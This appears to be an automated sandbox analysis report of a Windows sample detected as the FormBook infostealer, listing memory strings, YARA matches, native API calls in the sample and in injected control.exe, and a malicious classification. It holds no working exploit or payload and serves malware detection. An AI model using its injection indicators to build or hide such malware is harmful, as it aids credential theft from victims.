          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004181BA NtCreateFile,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459560 NtWriteFile,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0145AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014599D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014595F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0145B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459760 NtOpenProcess,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0145A770 NtOpenThread,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0145A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0145A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459A10 NtQuerySection,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014596D0 NtCreateKey,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B8270 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B82F0 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B81BA NtCreateFile,
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 0_2_0186D4E1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 0_2_0186C2B0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 0_2_01869990
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 0_2_0186FCB0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 0_2_0186FCC0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041C07D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00401030
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B93A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041BB23
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00408C60
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041C576
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B52F
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00402D87
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00402D90
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B77D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E1D55
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141F900
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E2D07
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01410D20
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142D5E0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1002
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142841F
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142B090
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E20A8
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E2B28
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E1FF1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144EBB0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01436E30
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E2EF7
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E22AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_048020A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1002
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04730D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04754120
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_048025DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04802D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04801D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_048022AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04756E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04802EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04801FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04802B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FDBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB93B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A8C60
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BC576
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB52F
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A2D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A2D87
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0473B150 appears 35 times
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: String function: 0141B150 appears 35 times
          Source: 350969bc_by_Libranalysis.exeBinary or memory string: OriginalFilename vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.669296365.0000000006830000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662905887.0000000003441000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exeBinary or memory string: OriginalFilename vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exeBinary or memory string: OriginalFilename vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exeBinary or memory string: OriginalFilename vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716595208.000000000150F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716202775.0000000001171000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exeBinary or memory string: OriginalFilenameTextInfo.exe8 vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 350969bc_by_Libranalysis.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@11/1@12/12
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\350969bc_by_Libranalysis.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_01
          Source: 350969bc_by_Libranalysis.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
